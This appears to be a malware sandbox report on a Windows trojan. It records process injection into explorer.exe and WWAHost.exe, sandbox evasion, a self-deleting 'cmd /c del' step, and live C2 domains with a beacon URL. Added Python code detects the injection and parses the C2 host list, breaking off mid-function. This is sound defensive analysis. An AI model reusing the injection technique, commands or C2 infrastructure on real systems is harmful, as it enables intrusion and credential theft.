          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C810 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152483A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A2835 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AE8C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015508C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BC8F9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150C89D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480887 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152EB50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01552B57 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01528B42 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516B40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154AB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478B50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534B4B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147CB7E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FEB1D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554B00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEB20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01548B28 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A0BCB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152EBD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480BCD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150CBF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEBFC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01488BF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01534BB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01490A5B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486A50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA6F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152EA60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FCA72 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150CA11 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AEA2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA24 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BCA38 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A4A35 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014D6ACC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01480AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B4AD0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BAAEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148EA80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0016E8B5 GetProcessHeap,HeapAlloc,GetProcessHeap,
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0016D470 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe NtQueueApcThread: Indirect: 0x18BA4F2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe NtClose: Indirect: 0x18BA56C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory written: C:\Users\user\Desktop\yaM8XR1HfL.exe base: 170000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory written: C:\Users\user\Desktop\yaM8XR1HfL.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: NULL target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread register set: target process: 1028
          Source: C:\Windows\SysWOW64\WWAHost.exe Thread register set: target process: 1028
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 120000
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process created: C:\Users\user\Desktop\yaM8XR1HfL.exe "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3299247758.0000000004B00000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.3294750047.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2497456423.0000000001731000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.2496782788.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PProgman
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Users\user\Desktop\yaM8XR1HfL.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00158158 GetCurrentThreadId,GetCurrentThreadId,GetSystemTimeAsFileTime,GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentProcessId,9_2_00158158
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001A78E0 memset,memset,RtlGetVersion,9_2_001A78E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
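The signatures above record the injection chain (an APC queued into explorer.exe, thread contexts set in process 1028, execute/read/write sections mapped into WWAHost.exe) and the clean-up step, WWAHost.exe running cmd.exe /c del on the sample. The Python below is an added example of host-based detection logic for that chain; it is not code from the report or from Joe Sandbox. Its events are constructed to mirror the report's process tree, every pid in it is made up, and the access masks are the process rights from winnt.h.

```python
"""Detect the two observable steps of the report's chain from Sysmon-style
events: a process obtaining write+thread-control access to another process
(injection handle), and cmd.exe deleting the image of a process in the
same tree (proxy self-deletion).  Added example; events are constructed."""
import re
from collections import namedtuple

# kind is "create" (Sysmon Event ID 1) or "access" (Event ID 10, whose
# GrantedAccess is carried in `granted`).
Event = namedtuple("Event", "kind pid ppid image cmdline target granted")


def create(pid, ppid, image, cmdline=""):
    return Event("create", pid, ppid, image, cmdline, None, 0)


def access(pid, target, granted):
    return Event("access", pid, None, None, "", target, granted)


SAMPLE = r"C:\Users\user\Desktop\yaM8XR1HfL.exe"
EVENTS = [  # constructed to mirror the report's process tree; pids made up
    create(3000, 900, r"C:\Windows\explorer.exe"),
    create(4100, 3000, SAMPLE, f'"{SAMPLE}"'),
    create(4120, 4100, SAMPLE, f'"{SAMPLE}"'),        # second copy of the sample
    access(4120, 3000, 0x1FFFFF),                     # APC queue / thread context into explorer.exe
    create(5200, 3000, r"C:\Windows\SysWOW64\WWAHost.exe"),
    access(4120, 5200, 0x1FFFFF),                     # RWX section mapped into WWAHost.exe
    create(6300, 5200, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{SAMPLE}"'),
    create(6310, 6300, r"C:\Windows\System32\conhost.exe"),
    # benign controls: a query-only handle, and a del of a non-executable
    create(7000, 3000, r"C:\Windows\System32\notepad.exe"),
    access(7000, 3000, 0x1000),                       # PROCESS_QUERY_LIMITED_INFORMATION
    create(7100, 3000, r"C:\Windows\System32\cmd.exe", r'/c del "C:\Temp\old.log"'),
]

# Process access rights (winnt.h).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
PROCESS_SET_INFORMATION = 0x0200
PROCESS_SUSPEND_RESUME = 0x0800
WRITE_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE
THREAD_MASK = PROCESS_CREATE_THREAD | PROCESS_SET_INFORMATION | PROCESS_SUSPEND_RESUME

# "del <path>" as the last command on a cmd.exe command line.
DEL_RE = re.compile(r'(?:^|[\s&|])del\s+"?(?P<path>[^"&|]+?)"?\s*$', re.I)


def process_table(events):
    return {e.pid: e for e in events if e.kind == "create"}


def ancestry(procs, pid):
    """Image names from pid upwards until a parent we have no record of."""
    names, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        names.append(procs[pid].image.rsplit("\\", 1)[-1])
        pid = procs[pid].ppid
    return names


def detect(events):
    """Return (rule, pid, detail) tuples for the two rules described above."""
    procs = process_table(events)
    images = {e.image.lower() for e in procs.values()}
    name = lambda pid: ancestry(procs, pid)[0] if pid in procs else str(pid)
    findings = []
    for e in events:
        if e.kind == "access" and e.target in procs:
            can_write = (e.granted & WRITE_MASK) == WRITE_MASK
            can_run = bool(e.granted & THREAD_MASK)
            if can_write and can_run:
                findings.append(("injection_handle", e.pid,
                                 f"{name(e.pid)} -> {name(e.target)} granted {e.granted:#x}"))
        elif e.kind == "create" and e.image.lower().endswith("\\cmd.exe"):
            m = DEL_RE.search(e.cmdline)
            if m and m["path"].strip().lower() in images:
                chain = " <- ".join(ancestry(procs, e.pid))
                findings.append(("proxy_self_delete", e.pid,
                                 f"{chain} deletes {m['path']}"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"[{rule}] pid {pid}: {detail}")
```

On the constructed events this yields two injection_handle findings for the second sample process (targets explorer.exe and WWAHost.exe) and one proxy_self_delete finding whose ancestry reads cmd.exe <- WWAHost.exe <- explorer.exe, while the notepad.exe handle and the deletion of a log file stay silent. In production the handle rule needs an allowlist: debuggers, AV and backup agents legitimately open processes with the same mask, so filter by signer or image path before alerting.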

Stealing of Sensitive Information

Source: Yara match | File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (reconstructed from the flattened matrix; only techniques that carry a count badge in the report are listed, tactics with no marked technique are omitted, and the badge digits are reproduced exactly as extracted, so adjacent badges may appear run together, e.g. "512")

Initial Access: Valid Accounts (1)
Execution: Native API (1); Shared Modules (1)
Persistence: DLL Side-Loading (1); Valid Accounts (1)
Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (1); Access Token Manipulation (1); Process Injection (512)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1); Rootkit (1); Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (41); Process Injection (512); Hidden Files and Directories (1)
Credential Access: Credential API Hooking (1)
Discovery: System Time Discovery (11); File and Directory Discovery (1); System Information Discovery (214); Security Software Discovery (241); Process Discovery (2); Virtualization/Sandbox Evasion (41); Application Window Discovery (1)
Collection: Archive Collected Data (1); Credential API Hooking (1)
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (12)
Behavior Graph (reconstructed from the graph's node labels): ID 1465386, Sample: yaM8XR1HfL.exe, Start date: 01/07/2024, Architecture: WINDOWS, Score: 100

Start
  contacted domains: www.osthirmaker.com, www.nftees.tech
  signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
  yaM8XR1HfL.exe (started)
    dropped: C:\Users\user\AppData\...\yaM8XR1HfL.exe.log, ASCII
    signatures: Tries to detect virtualization through RDTSC time measurements; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes; Switches to a custom stack to bypass stack traces
    yaM8XR1HfL.exe (started)
      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
      explorer.exe (injected)
        network: www.nftees.tech 217.160.0.1, ports 49718 -> 80, ONEANDONE-ASBrauerstrasse48DE Germany
        WWAHost.exe (started)
          signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
          cmd.exe (started)
            conhost.exe (started)
    yaM8XR1HfL.exe (started)

Source | Detection | Scanner | Label | Link
yaM8XR1HfL.exe | 68% | ReversingLabs | Win32.Trojan.Leonem |
yaM8XR1HfL.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://schemas.micro | 0% | URL Reputation | safe
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe
https://api.msn.com/ | 0% | URL Reputation | safe
http://www.dexcoenergy.com/na10/www.hokivegasslots.club | 0% | Avira URL Cloud | safe
http://www.nftees.tech/na10/ | 0% | Avira URL Cloud | safe
www.liamcollinai.com/na10/ | 0% | Avira URL Cloud | safe
http://www.giorgiaclerico.comReferer: | 0% | Avira URL Cloud | safe
https://word.office.comon | 0% | Avira URL Cloud | safe
http://www.productivagc.comReferer: | 0% | Avira URL Cloud | safe
http://www.abc8bet6.comReferer: | 0% | Avira URL Cloud | safe
http://www.nbvci.xyz/na10/www.abc8bet6.com | 0% | Avira URL Cloud | safe
http://www.bz59.topReferer: | 0% | Avira URL Cloud | safe
http://www.thelonelyteacup.com/na10/ | 0% | Avira URL Cloud | safe
http://www.bz59.top/na10/www.jakobniinja.xyz | 0% | Avira URL Cloud | safe
http://www.nftees.techReferer: | 0% | Avira URL Cloud | safe
http://www.nbvci.xyzReferer: | 0% | Avira URL Cloud | safe
http://www.sasoera.com/na10/www.liamcollinai.com | 0% | Avira URL Cloud | safe
http://www.giorgiaclerico.com | 0% | Avira URL Cloud | safe
https://powerpoint.office.comcember | 0% | Avira URL Cloud | safe
http://www.nona23.lat/na10/www.giorgiaclerico.com | 100% | Avira URL Cloud | malware
http://www.dexcoenergy.comReferer: | 0% | Avira URL Cloud | safe
https://excel.office.com | 0% | Avira URL Cloud | safe
http://www.snykee.com/na10/www.awclog.com | 0% | Avira URL Cloud | safe
http://www.nbvci.xyz | 0% | Avira URL Cloud | safe
http://www.osthirmaker.comReferer: | 0% | Avira URL Cloud | safe
http://www.hokivegasslots.club/na10/www.thelonelyteacup.com | 0% | Avira URL Cloud | safe
http://www.liamcollinai.com | 0% | Avira URL Cloud | safe
http://www.snykee.com/na10/ | 0% | Avira URL Cloud | safe
http://www.abc8bet6.com/na10/www.productivagc.com | 0% | Avira URL Cloud | safe
http://www.osthirmaker.com/na10/www.nftees.tech | 0% | Avira URL Cloud | safe
http://www.awclog.com/na10/www.sasoera.com | 0% | Avira URL Cloud | safe
http://www.nftees.tech/na10/www.nbvci.xyz | 0% | Avira URL Cloud | safe
http://www.awclog.com | 0% | Avira URL Cloud | safe
http://www.osthirmaker.com/na10/ | 0% | Avira URL Cloud | safe
http://www.nona23.latReferer: | 0% | Avira URL Cloud | safe
http://www.liamcollinai.comReferer: | 0% | Avira URL Cloud | safe
http://www.giorgiaclerico.com/na10/ | 0% | Avira URL Cloud | safe
http://www.snykee.com | 0% | Avira URL Cloud | safe
http://www.nbvci.xyz/na10/ | 0% | Avira URL Cloud | safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | Avira URL Cloud | safe
http://www.productivagc.com/na10/www.dexcoenergy.com | 100% | Avira URL Cloud | malware
http://www.nftees.tech/na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h | 0% | Avira URL Cloud | safe
https://wns.windows.com/)s | 0% | Avira URL Cloud | safe
http://www.nftees.tech | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
http://www.liamcollinai.com/na10/www.nona23.lat | 0% | Avira URL Cloud | safe
http://www.thelonelyteacup.comReferer: | 0% | Avira URL Cloud | safe
http://www.nona23.lat | 0% | Avira URL Cloud | safe
http://www.awclog.comReferer: | 0% | Avira URL Cloud | safe
http://www.jakobniinja.xyz | 0% | Avira URL Cloud | safe
http://www.hokivegasslots.club/na10/ | 0% | Avira URL Cloud | safe
http://www.hokivegasslots.clubReferer: | 0% | Avira URL Cloud | safe
http://www.abc8bet6.com | 0% | Avira URL Cloud | safe
http://www.productivagc.com/na10/ | 0% | Avira URL Cloud | safe
http://www.jakobniinja.xyz/na10/ | 0% | Avira URL Cloud | safe
http://www.snykee.comReferer: | 0% | Avira URL Cloud | safe
http://www.liamcollinai.com/na10/ | 0% | Avira URL Cloud | safe
https://outlook.com | 0% | Avira URL Cloud | safe
http://www.thelonelyteacup.com | 0% | Avira URL Cloud | safe
http://www.osthirmaker.com | 0% | Avira URL Cloud | safe
http://www.awclog.com/na10/ | 0% | Avira URL Cloud | safe
http://www.jakobniinja.xyzReferer: | 0% | Avira URL Cloud | safe
http://www.jakobniinja.xyz/na10/e | 0% | Avira URL Cloud | safe
http://www.sasoera.com/na10/ | 0% | Avira URL Cloud | safe
http://www.giorgiaclerico.com/na10/www.bz59.top | 0% | Avira URL Cloud | safe
http://www.hokivegasslots.club | 0% | Avira URL Cloud | safe
http://www.sasoera.comReferer: | 0% | Avira URL Cloud | safe
http://www.dexcoenergy.com | 0% | Avira URL Cloud | safe
http://www.thelonelyteacup.com/na10/www.snykee.com | 0% | Avira URL Cloud | safe
http://www.bz59.top | 0% | Avira URL Cloud | safe
http://www.dexcoenergy.com/na10/ | 0% | Avira URL Cloud | safe
http://ns.adobe. | 0% | Avira URL Cloud | safe
http://www.productivagc.com | 0% | Avira URL Cloud | safe
http://crl.v | 0% | Avira URL Cloud | safe
http://iptc.org/std/Iptc4xmde | 0% | Avira URL Cloud | safe
http://www.bz59.top/na10/ | 0% | Avira URL Cloud | safe
http://www.nona23.lat/na10/ | 100% | Avira URL Cloud | malware
http://www.sasoera.com | 0% | Avira URL Cloud | safe
http://www.abc8bet6.com/na10/ | 0% | Avira URL Cloud | safe
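The URL table above carries the /na10/ host list as the report extracted it from explorer.exe memory: most strings are "http://<host>/na10/" followed by another host. The Python below is an added example, not code from the report or from Joe Sandbox; it parses the flattened rows as they appear on this page and rebuilds the host list from those overlapping strings. It assumes two things the report does not state: that each row is "<url><detection>%<scanner><label>" run together, and that the host trailing /na10/ is the next entry of the in-memory list, so the trailing hosts give the list order.

```python
"""Recover the /na10/ host list from the flattened URL-reputation rows of
this report.  Added example; row format and list-order assumptions are
described in the lead-in and are not stated by the report itself."""
import re

# Rows copied verbatim from the report's URL table (flattened extraction).
REPORT_ROWS = [
    "http://www.dexcoenergy.com/na10/www.hokivegasslots.club0%Avira URL Cloudsafe",
    "http://www.nftees.tech/na10/0%Avira URL Cloudsafe",
    "www.liamcollinai.com/na10/0%Avira URL Cloudsafe",
    "http://www.giorgiaclerico.comReferer:0%Avira URL Cloudsafe",
    "http://www.nbvci.xyz/na10/www.abc8bet6.com0%Avira URL Cloudsafe",
    "http://www.bz59.top/na10/www.jakobniinja.xyz0%Avira URL Cloudsafe",
    "http://www.sasoera.com/na10/www.liamcollinai.com0%Avira URL Cloudsafe",
    "http://www.nona23.lat/na10/www.giorgiaclerico.com100%Avira URL Cloudmalware",
    "http://www.snykee.com/na10/www.awclog.com0%Avira URL Cloudsafe",
    "http://www.hokivegasslots.club/na10/www.thelonelyteacup.com0%Avira URL Cloudsafe",
    "http://www.abc8bet6.com/na10/www.productivagc.com0%Avira URL Cloudsafe",
    "http://www.osthirmaker.com/na10/www.nftees.tech0%Avira URL Cloudsafe",
    "http://www.awclog.com/na10/www.sasoera.com0%Avira URL Cloudsafe",
    "http://www.nftees.tech/na10/www.nbvci.xyz0%Avira URL Cloudsafe",
    "http://www.productivagc.com/na10/www.dexcoenergy.com100%Avira URL Cloudmalware",
    "http://www.nftees.tech/na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h0%Avira URL Cloudsafe",
    "http://www.liamcollinai.com/na10/www.nona23.lat0%Avira URL Cloudsafe",
    "http://www.jakobniinja.xyz/na10/e0%Avira URL Cloudsafe",
    "http://www.giorgiaclerico.com/na10/www.bz59.top0%Avira URL Cloudsafe",
    "http://www.thelonelyteacup.com/na10/www.snykee.com0%Avira URL Cloudsafe",
    "https://excel.office.com0%Avira URL Cloudsafe",
    "http://schemas.micro0%URL Reputationsafe",
]

# "<url><0-100>%<scanner><safe|malware>": the url is matched non-greedily, so
# the score is the first run of digits that is directly followed by "%".
ROW_RE = re.compile(
    r"^(?P<url>.+?)(?P<score>\d{1,3})%"
    r"(?P<scanner>URL Reputation|Avira URL Cloud)(?P<label>safe|malware)$"
)
# "http://<host>/<campaign>/<next host>"; the trailing host is optional since
# some strings end in the campaign path, a query string or a stray character.
C2_RE = re.compile(
    r"^(?:https?://)?(?P<host>www\.[a-z0-9.-]+)/(?P<campaign>[a-z0-9]+)/"
    r"(?P<next>www\.[a-z0-9.-]+)?",
    re.I,
)


def parse_row(row):
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    return {"url": m["url"], "score": int(m["score"]),
            "scanner": m["scanner"], "label": m["label"]}


def parse_c2_url(url):
    """Return (host, campaign, next_host_or_None), or None for non-C2 strings."""
    m = C2_RE.match(url)
    if not m:
        return None
    nxt = m["next"].lower() if m["next"] else None
    return m["host"].lower(), m["campaign"].lower(), nxt


def c2_chain(rows):
    """Return (campaign path, hosts in list order, worst label seen per host)."""
    successor, hosts, campaigns, labels = {}, set(), set(), {}
    for row in rows:
        rec = parse_row(row)
        parsed = parse_c2_url(rec["url"])
        if parsed is None:
            continue  # "Referer:" fragments, Office/MSN URLs and the like
        host, campaign, nxt = parsed
        campaigns.add(campaign)
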